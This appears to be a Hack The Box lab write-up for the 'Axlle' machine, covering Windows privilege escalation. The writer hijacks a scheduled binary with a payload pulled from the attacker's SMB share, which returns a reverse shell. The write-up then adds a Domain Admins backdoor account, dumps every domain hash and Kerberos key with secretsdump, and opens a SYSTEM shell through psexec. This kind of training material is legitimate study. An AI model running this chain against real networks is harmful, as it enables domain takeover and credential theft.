Binary Hijacking

It was discovered that there is an automated task executing a binary, C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe, periodically. Additionally, the AXLLE\App Devs group has both read and write access to the directory.

This would mean that I could just replace the binary.

*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> copy \\10.10.14.110\smb\standalonerunner.exe .

Hijacking the binary with the payload

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.21] 62784
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.
 
C:\>whoami
whoami
axlle\administrator
 
C:\>hostname
hostname
MAINFRAME
 
C:\>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::133
   IPv6 Address. . . . . . . . . . . : dead:beef::3639:612c:2fa5:d871
   Link-local IPv6 Address . . . . . : fe80::88b8:44c8:5dc4:622c%11
   IPv4 Address. . . . . . . . . . . : 10.10.11.21
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%11
                                       10.10.10.2

System Level Compromise

Hashdump

PS C:\Users\Administrator\Desktop> net user adm1n Qwer1234 /ADD /DOMAIN
net user adm1n Qwer1234 /ADD /DOMAIN
The command completed successfully.
 
PS C:\Users\Administrator\Desktop> net groups "Domain Admins" /ADD adm1n
net groups "Domain Admins" /ADD adm1n
The command completed successfully.

Creating a DA

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ impacket-secretsdump AXLLE.HTB/adm1n:Qwer1234@mainframe.axlle.htb -k -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[-] CCache file is not found. Skipping...
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3e4ae85a02ffdaf95b4c5c29169996eb
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:29bab6d9d4208e11bdd57768e7a4bd2f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
AXLLE\MAINFRAME$:plain_password_hex:c505777562333892d5dda1aaf5fb313a92b679350ec1fd0a905582c090c5cfce48621da1ef31c7797e04c699b51d699f3dd0aee519de343ce505a59576b5702cb51c0e0c35b127accfc37135a7c5a72544986f755cbcd9bba4b69c2fb0daac1ded2a6b2a3f1b4a25fa8e2beb66b340feb688807f5fb3a61ac0b7a7b26fca9c568188b6ce93442fe603e83df29df708c08dad0ea0cf58488e250b47bcac3462df5a59c8d3990729d0f160432df435f48fa9751490fa3b83848892e3fc02d43781b73c99df66fc24128c96b6c88b108137e2395ea2cbf028ad769ec241ba19101522546625684312f348fa2797e4e434b6
AXLLE\MAINFRAME$:aad3b435b51404eeaad3b435b51404ee:011a082f7649082b7fe7521c2ae2bb2a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xeaa9353ae32a4ea48059131477fadfb0121dceae
dpapi_userkey:0xba70c3013bb0cd1c4e0222739fb2246cfc3825ba
[*] NL$KM 
 0000   13 32 FF B1 04 44 69 69  FA 70 9C B8 20 9A AE F9   .2...Dii.p.. ...
 0010   C2 05 FF E7 EA C3 54 16  05 38 DD 19 48 05 13 E7   ......T..8..H...
 0020   0A 40 6E 2F 6B F3 DC A3  17 47 87 6E 97 11 71 A7   .@n/k....G.n..q.
 0030   B8 12 E2 17 37 AE 4A 23  B6 91 1E 64 13 56 5D DA   ....7.J#...d.V].
NL$KM:1332ffb104446969fa709cb8209aaef9c205ffe7eac354160538dd19480513e70a406e2f6bf3dca31747876e971171a7b812e21737ae4a23b6911e6413565dda
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6322b5b9f9daecb0fefd594fa6fafb6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6d92f4784b46504cf3bedbc702ac03fe:::
axlle.htb\david.brice:1109:aad3b435b51404eeaad3b435b51404ee:0279f2a1f290ff139458088afb45fa3f:::
axlle.htb\frankie.rose:1110:aad3b435b51404eeaad3b435b51404ee:80c10c678c9b31e2091065c90519e529:::
axlle.htb\brad.shaw:1111:aad3b435b51404eeaad3b435b51404ee:9cefad58a9a2188687922a6cc10485a3:::
axlle.htb\samantha.jade:1112:aad3b435b51404eeaad3b435b51404ee:8047ec8cda0666f4e1c1be0ddc2d0378:::
axlle.htb\gideon.hamill:1113:aad3b435b51404eeaad3b435b51404ee:aa753e07e1fd47a45e0ecb3a0cc70dab:::
axlle.htb\xavier.edmund:1114:aad3b435b51404eeaad3b435b51404ee:9ecaa82cc22e0e1534493a03276dc02b:::
axlle.htb\emily.cook:1115:aad3b435b51404eeaad3b435b51404ee:b35775e6e9d3af6c0dcf33cef162986d:::
axlle.htb\brooke.graham:1116:aad3b435b51404eeaad3b435b51404ee:bcd1044566a9fb7fe130bdd5bcce7db1:::
axlle.htb\trent.langdon:1117:aad3b435b51404eeaad3b435b51404ee:a4bbfacd030508d12f3a203bbab8b1f8:::
axlle.htb\matt.drew:1118:aad3b435b51404eeaad3b435b51404ee:eb116285721b66b71d98803716b94616:::
axlle.htb\jess.adams:1119:aad3b435b51404eeaad3b435b51404ee:933d10a14def0ed5ffbd708092d92e4d:::
axlle.htb\jacob.greeny:1120:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
axlle.htb\simon.smalls:1121:aad3b435b51404eeaad3b435b51404ee:d14ddd0880870e9d7fcb442653b6183e:::
axlle.htb\dan.kendo:1122:aad3b435b51404eeaad3b435b51404ee:3fa7f786ca68123db7fdef522cb93a22:::
axlle.htb\lindsay.richards:1123:aad3b435b51404eeaad3b435b51404ee:71d62e4384f2e9b92169a10a29539b2d:::
axlle.htb\calum.scott:1124:aad3b435b51404eeaad3b435b51404ee:35a376bb58095b4a559fbceccdb01364:::
axlle.htb\dallon.matrix:1125:aad3b435b51404eeaad3b435b51404ee:124a4a99bf67ca4b04e2266f967daa64:::
axlle.htb\baz.humphries:1126:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
adm1n:7101:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
MAINFRAME$:1000:aad3b435b51404eeaad3b435b51404ee:011a082f7649082b7fe7521c2ae2bb2a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9a04a367713f0fe1ed91f653f656c2193420b01d370ec4df315c3b14c805cd5b
Administrator:aes128-cts-hmac-sha1-96:cae98f39723c5170678f6aa964316977
Administrator:des-cbc-md5:fba2d3b00bec3e89
krbtgt:aes256-cts-hmac-sha1-96:ae2eb9caff08a7d80b1b9166f71a4de91e1bec20705400433383adf27f8d2a69
krbtgt:aes128-cts-hmac-sha1-96:096a951763767ceca7e1e5a5628451bd
krbtgt:des-cbc-md5:9e545e64542a7070
axlle.htb\david.brice:aes256-cts-hmac-sha1-96:c11a3cbfa80fdfe3dabfa0e5fc7a08b1fc199c26495818b6b6593b53971838c9
axlle.htb\david.brice:aes128-cts-hmac-sha1-96:e90ac01503ff90ad46acc9988a582cb8
axlle.htb\david.brice:des-cbc-md5:c2385db6c4b6d0b3
axlle.htb\frankie.rose:aes256-cts-hmac-sha1-96:ac64b7883c8e107f1dad48102eb5d8a1972100b84e1e747ab78f06702f368998
axlle.htb\frankie.rose:aes128-cts-hmac-sha1-96:a4656605c47ead66c7a9df5426aac6a7
axlle.htb\frankie.rose:des-cbc-md5:015b20582f3e4c4c
axlle.htb\brad.shaw:aes256-cts-hmac-sha1-96:5ba4537f0b8a58dc49874d6cf4a4ba77fa9ba7a223b68b7cbb3b142023373445
axlle.htb\brad.shaw:aes128-cts-hmac-sha1-96:664def88946a46f48f49097198e2123b
axlle.htb\brad.shaw:des-cbc-md5:67511349b97f7925
axlle.htb\samantha.jade:aes256-cts-hmac-sha1-96:f07d08f72302cb1070b68bda9eecabe8ebc24533a57e01a8ed1c68621ba167d4
axlle.htb\samantha.jade:aes128-cts-hmac-sha1-96:45dea3054965826800735e48b7c6bef9
axlle.htb\samantha.jade:des-cbc-md5:d0c743981f38074f
axlle.htb\gideon.hamill:aes256-cts-hmac-sha1-96:a294c1f62ed6abdac5e4da35f00bb6774187b8883d79bf1f5b0335197de6b2b3
axlle.htb\gideon.hamill:aes128-cts-hmac-sha1-96:2d99599bf6e7360904e438ae60847650
axlle.htb\gideon.hamill:des-cbc-md5:3e9158268fa2e691
axlle.htb\xavier.edmund:aes256-cts-hmac-sha1-96:5adcbd1df6ae1ccfbdad217f809b0104203856695fca0ed5dda4a8ac408b2561
axlle.htb\xavier.edmund:aes128-cts-hmac-sha1-96:768bc28a91d0d6ce06db096c5fa91379
axlle.htb\xavier.edmund:des-cbc-md5:1f79ea9db51c79c8
axlle.htb\emily.cook:aes256-cts-hmac-sha1-96:de639a5a7b08d8ba1b98a12ddac23702932a2501115942110f19600b476a6b72
axlle.htb\emily.cook:aes128-cts-hmac-sha1-96:64f7f9015eaf44545aceab0c08a0be18
axlle.htb\emily.cook:des-cbc-md5:e362626d236d29c1
axlle.htb\brooke.graham:aes256-cts-hmac-sha1-96:8a4014990f19f51c2be7884f17d498cbdc499c790658ca8b4aeb0e41b76811d0
axlle.htb\brooke.graham:aes128-cts-hmac-sha1-96:10b64c247a7123d260a4db78209add1f
axlle.htb\brooke.graham:des-cbc-md5:80011025862c6eba
axlle.htb\trent.langdon:aes256-cts-hmac-sha1-96:3789f8c3c521dc1360e692bf3c658cc58dc93ceaa5e5ed35271601e31bc5a011
axlle.htb\trent.langdon:aes128-cts-hmac-sha1-96:a20ddd25a79229f4f6b1fe244042bc66
axlle.htb\trent.langdon:des-cbc-md5:e304ce082f76c132
axlle.htb\matt.drew:aes256-cts-hmac-sha1-96:94c990b6de48942f85ee83503e9424020995ccede40a04eb40fe698e6c15c7c0
axlle.htb\matt.drew:aes128-cts-hmac-sha1-96:8fc7d4f688cf3703f61d66891ffb4349
axlle.htb\matt.drew:des-cbc-md5:619445e02ff864e5
axlle.htb\jess.adams:aes256-cts-hmac-sha1-96:2227ace881e583d7ff00d41caab262c7322d795b2653944924ae360e487ecc70
axlle.htb\jess.adams:aes128-cts-hmac-sha1-96:58d721390c9e370bab991326de3471b9
axlle.htb\jess.adams:des-cbc-md5:b3c2c7a10b7302da
axlle.htb\jacob.greeny:aes256-cts-hmac-sha1-96:4a540100ba65d314fa0c9ed1cc8c3bc081f95e511fa52fda865de05ffb468d60
axlle.htb\jacob.greeny:aes128-cts-hmac-sha1-96:58798f1287d17ea6e5abf8162c8f778b
axlle.htb\jacob.greeny:des-cbc-md5:1f92ae3267aea1a7
axlle.htb\simon.smalls:aes256-cts-hmac-sha1-96:b6b8dab9b81b6d5a44c2b0701006327e4b472100d5c15b93ceac6330a6314ccf
axlle.htb\simon.smalls:aes128-cts-hmac-sha1-96:2fab6c12a5e56bb8baab575505de9ac1
axlle.htb\simon.smalls:des-cbc-md5:047f1ad064c713d0
axlle.htb\dan.kendo:aes256-cts-hmac-sha1-96:1b3c93951ded9573a543e2492f6d3cdf5bf43cf33aaedb6a2c2e12c148d1dc23
axlle.htb\dan.kendo:aes128-cts-hmac-sha1-96:cece3c1a79567e51093a5a64ff67eccc
axlle.htb\dan.kendo:des-cbc-md5:4f86bc7f1a23a1b9
axlle.htb\lindsay.richards:aes256-cts-hmac-sha1-96:1e94d90750ba486bdba61686d89f6dfd8c49122bf3342c13fd1136afbbb01b45
axlle.htb\lindsay.richards:aes128-cts-hmac-sha1-96:1452c8734b5d8d95708879621770adfb
axlle.htb\lindsay.richards:des-cbc-md5:f404c8e697b36297
axlle.htb\calum.scott:aes256-cts-hmac-sha1-96:09a7d82acc475a40f343debb20b469563560adc8f90b45d422e950ecfb58d8c7
axlle.htb\calum.scott:aes128-cts-hmac-sha1-96:1ec39edf9580136ad7548eea60355ab8
axlle.htb\calum.scott:des-cbc-md5:d3647cf16219831c
axlle.htb\dallon.matrix:aes256-cts-hmac-sha1-96:9f7b94cbbbb01f26cbd8cf48b82f7b3db700211d37c4c98cc250bf5630f1058f
axlle.htb\dallon.matrix:aes128-cts-hmac-sha1-96:6d6f56215c90b791805dd1b01cc96f5c
axlle.htb\dallon.matrix:des-cbc-md5:9b9b2c8397ba8cb5
axlle.htb\baz.humphries:aes256-cts-hmac-sha1-96:2080b8579a387c01158216909a588c37038f6f4eef0546fccf7b2464e006accb
axlle.htb\baz.humphries:aes128-cts-hmac-sha1-96:e14423cac426390a5a973911341a0197
axlle.htb\baz.humphries:des-cbc-md5:df341ccba4c89419
adm1n:aes256-cts-hmac-sha1-96:ae3284bba5654e85cea79655db57be43e50ead33b03aaa71b1fd5dad3450297a
adm1n:aes128-cts-hmac-sha1-96:175eb193a70815aea6c6ec6a3a786446
adm1n:des-cbc-md5:cdf1ea4fe0ef32c4
MAINFRAME$:aes256-cts-hmac-sha1-96:43546f71913399b41aa44d559b7cb4dd097c8b4f8633c0115302bfff627d16c2
MAINFRAME$:aes128-cts-hmac-sha1-96:6031d3099f3e69d5cd74e5460043c830
MAINFRAME$:des-cbc-md5:2f0270d383159d38
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Shell Drop (SYSTEM)

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ impacket-psexec AXLLE.HTB/adm1n:Qwer1234@mainframe.axlle.htb -k -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[-] CCache file is not found. Skipping...
[*] Requesting shares on mainframe.axlle.htb.....
[*] Found writable share ADMIN$
[*] Uploading file pHwAsqjr.exe
[*] Opening SVCManager on mainframe.axlle.htb.....
[*] Creating service nGec on mainframe.axlle.htb.....
[*] Starting service nGec.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
MAINFRAME
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::133
   IPv6 Address. . . . . . . . . . . : dead:beef::3639:612c:2fa5:d871
   Link-local IPv6 Address . . . . . : fe80::88b8:44c8:5dc4:622c%11
   IPv4 Address. . . . . . . . . . . : 10.10.11.21
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%11
                                       10.10.10.2

InfoSec LAB

Explorer

Axlle_Privilege_Escalation

Binary Hijacking

Hashdump

Shell Drop (SYSTEM)

Interactive Graph View

Table of Contents

Backlinks